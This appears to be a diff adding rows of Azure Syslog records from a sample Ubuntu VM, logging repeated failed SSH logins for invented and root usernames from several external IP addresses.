+9071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:19,UbuntuDevEnv,2019-06-25 22:20:19,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 27714:11: Bye Bye [preauth],43622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,27714,,
+9072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:27,UbuntuDevEnv,2019-06-25 22:20:27,auth,UbuntuDevEnv,info,Invalid user family from 178.62.54.79 port 46946,43654,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,family,178.62.54.7,46946,,
+9073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:27,UbuntuDevEnv,2019-06-25 22:20:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43654,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:27,UbuntuDevEnv,2019-06-25 22:20:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,43654,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:29,UbuntuDevEnv,2019-06-25 22:20:28,auth,UbuntuDevEnv,info,Failed password for invalid user family from 178.62.54.79 port 46946 ssh2,43654,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,family,178.62.54.7,46946,,
+9076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:29,UbuntuDevEnv,2019-06-25 22:20:28,auth,UbuntuDevEnv,info,Disconnected from invalid user family 178.62.54.79 port 46946 [preauth],43654,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,family,178.62.54.7,46946,,
+9077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:29,UbuntuDevEnv,2019-06-25 22:20:28,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 46946:11: Bye Bye [preauth],43654,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,46946,,
+9078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:41,UbuntuDevEnv,2019-06-25 22:20:41,auth,UbuntuDevEnv,info,Invalid user pamela from 152.250.252.179 port 59746,43705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pamela,152.250.252.1,59746,,
+9079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:41,UbuntuDevEnv,2019-06-25 22:20:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:41,UbuntuDevEnv,2019-06-25 22:20:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,43705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:43,UbuntuDevEnv,2019-06-25 22:20:42,auth,UbuntuDevEnv,info,Invalid user registry from 165.22.96.224 port 42056,43710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,registry,165.22.96.2,42056,,
+9082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:43,UbuntuDevEnv,2019-06-25 22:20:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:43,UbuntuDevEnv,2019-06-25 22:20:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,43710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+9084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:43,UbuntuDevEnv,2019-06-25 22:20:43,auth,UbuntuDevEnv,info,Failed password for invalid user pamela from 152.250.252.179 port 59746 ssh2,43705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pamela,152.250.252.1,59746,,
+9085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:43,UbuntuDevEnv,2019-06-25 22:20:43,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 59746:11: Bye Bye [preauth],43705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,59746,,
+9086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:43,UbuntuDevEnv,2019-06-25 22:20:43,auth,UbuntuDevEnv,info,Disconnected from invalid user pamela 152.250.252.179 port 59746 [preauth],43705,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pamela,152.250.252.1,59746,,
+9087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:45,UbuntuDevEnv,2019-06-25 22:20:44,auth,UbuntuDevEnv,info,Failed password for invalid user registry from 165.22.96.224 port 42056 ssh2,43710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,registry,165.22.96.2,42056,,
+9088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:45,UbuntuDevEnv,2019-06-25 22:20:45,auth,UbuntuDevEnv,info,Disconnected from invalid user registry 165.22.96.224 port 42056 [preauth],43710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,registry,165.22.96.2,42056,,
+9089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:45,UbuntuDevEnv,2019-06-25 22:20:45,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 42056:11: Bye Bye [preauth],43710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,42056,,
+9090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:33,UbuntuDevEnv,2019-06-25 22:21:32,auth,UbuntuDevEnv,info,Invalid user martina from 139.199.113.140 port 51100,43888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,martina,139.199.113.1,51100,,
+9091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:33,UbuntuDevEnv,2019-06-25 22:21:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:33,UbuntuDevEnv,2019-06-25 22:21:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,43888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:35,UbuntuDevEnv,2019-06-25 22:21:35,auth,UbuntuDevEnv,info,Failed password for invalid user martina from 139.199.113.140 port 51100 ssh2,43888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,martina,139.199.113.1,51100,,
+9094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:35,UbuntuDevEnv,2019-06-25 22:21:35,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 51100:11: Bye Bye [preauth],43888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,51100,,
+9095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:35,UbuntuDevEnv,2019-06-25 22:21:35,auth,UbuntuDevEnv,info,Disconnected from invalid user martina 139.199.113.140 port 51100 [preauth],43888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,martina,139.199.113.1,51100,,
+9096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:50,UbuntuDevEnv,2019-06-25 22:21:49,auth,UbuntuDevEnv,info,Invalid user padoue from 212.156.136.114 port 39192,43954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,padoue,212.156.136.1,39192,,
+9097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:50,UbuntuDevEnv,2019-06-25 22:21:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:50,UbuntuDevEnv,2019-06-25 22:21:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,43954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:51,UbuntuDevEnv,2019-06-25 22:21:51,auth,UbuntuDevEnv,info,Failed password for invalid user padoue from 212.156.136.114 port 39192 ssh2,43954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,padoue,212.156.136.1,39192,,
+9100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:51,UbuntuDevEnv,2019-06-25 22:21:51,auth,UbuntuDevEnv,info,Disconnected from invalid user padoue 212.156.136.114 port 39192 [preauth],43954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,padoue,212.156.136.1,39192,,
+9101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:51,UbuntuDevEnv,2019-06-25 22:21:51,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 39192:11: Bye Bye [preauth],43954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,39192,,
+9102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:54,UbuntuDevEnv,2019-06-25 22:21:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79  user=root,43970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,178.62.54.7,,0,
+9103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:56,UbuntuDevEnv,2019-06-25 22:21:56,auth,UbuntuDevEnv,info,Failed password for root from 178.62.54.79 port 35094 ssh2,43970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,35094,,
+9104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:56,UbuntuDevEnv,2019-06-25 22:21:56,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 178.62.54.79 port 35094 [preauth],43970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,178.62.54.7,35094,,
+9105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:21:56,UbuntuDevEnv,2019-06-25 22:21:56,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 35094:11: Bye Bye [preauth],43970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,35094,,
+9106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:22:31,UbuntuDevEnv,2019-06-25 22:22:30,auth,UbuntuDevEnv,info,Invalid user MELSEC from 152.250.252.179 port 48182,44096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,MELSEC,152.250.252.1,48182,,
+9107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:22:31,UbuntuDevEnv,2019-06-25 22:22:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:22:31,UbuntuDevEnv,2019-06-25 22:22:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,44096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:22:33,UbuntuDevEnv,2019-06-25 22:22:32,auth,UbuntuDevEnv,info,Failed password for invalid user MELSEC from 152.250.252.179 port 48182 ssh2,44096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,MELSEC,152.250.252.1,48182,,
+9110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:22:33,UbuntuDevEnv,2019-06-25 22:22:32,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 48182:11: Bye Bye [preauth],44096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,48182,,
+9111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:22:33,UbuntuDevEnv,2019-06-25 22:22:32,auth,UbuntuDevEnv,info,Disconnected from invalid user MELSEC 152.250.252.179 port 48182 [preauth],44096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,MELSEC,152.250.252.1,48182,,
+9112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:17,UbuntuDevEnv,2019-06-25 22:23:16,auth,UbuntuDevEnv,info,Invalid user 10 from 178.62.54.79 port 51474,44260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,10,178.62.54.7,51474,,
+9113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:17,UbuntuDevEnv,2019-06-25 22:23:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:17,UbuntuDevEnv,2019-06-25 22:23:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,44260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:18,UbuntuDevEnv,2019-06-25 22:23:18,auth,UbuntuDevEnv,info,Failed password for invalid user 10 from 178.62.54.79 port 51474 ssh2,44260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,10,178.62.54.7,51474,,
+9116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:18,UbuntuDevEnv,2019-06-25 22:23:18,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 51474:11: Bye Bye [preauth],44260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,51474,,
+9117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:18,UbuntuDevEnv,2019-06-25 22:23:18,auth,UbuntuDevEnv,info,Disconnected from invalid user 10 178.62.54.79 port 51474 [preauth],44260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,10,178.62.54.7,51474,,
+9118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:22,UbuntuDevEnv,2019-06-25 22:23:21,auth,UbuntuDevEnv,info,Invalid user website from 212.156.136.114 port 21312,44281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,website,212.156.136.1,21312,,
+9119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:22,UbuntuDevEnv,2019-06-25 22:23:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:22,UbuntuDevEnv,2019-06-25 22:23:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,44281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:24,UbuntuDevEnv,2019-06-25 22:23:23,auth,UbuntuDevEnv,info,Failed password for invalid user website from 212.156.136.114 port 21312 ssh2,44281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,website,212.156.136.1,21312,,
+9122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:24,UbuntuDevEnv,2019-06-25 22:23:23,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 21312:11: Bye Bye [preauth],44281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,21312,,
+9123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:23:24,UbuntuDevEnv,2019-06-25 22:23:23,auth,UbuntuDevEnv,info,Disconnected from invalid user website 212.156.136.114 port 21312 [preauth],44281,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,website,212.156.136.1,21312,,
+9124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:17,UbuntuDevEnv,2019-06-25 22:24:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,44474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+9125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:17,UbuntuDevEnv,2019-06-25 22:24:17,auth,UbuntuDevEnv,info,Invalid user gp from 107.175.127.237 port 47574,44474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gp,107.175.127.2,47574,,
+9126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:17,UbuntuDevEnv,2019-06-25 22:24:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:17,UbuntuDevEnv,2019-06-25 22:24:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:17,UbuntuDevEnv,2019-06-25 22:24:17,auth,UbuntuDevEnv,info,Invalid user fwong from 152.250.252.179 port 36618,44475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fwong,152.250.252.1,36618,,
+9129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:17,UbuntuDevEnv,2019-06-25 22:24:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,44475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:24:18,UbuntuDevEnv,2019-06-25 22:24:18,auth,UbuntuDevEnv,info,Failed password for invalid user gp from 107.175.127.237 port 47574 ssh2,44474,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gp,107.175.127.2,47574,,
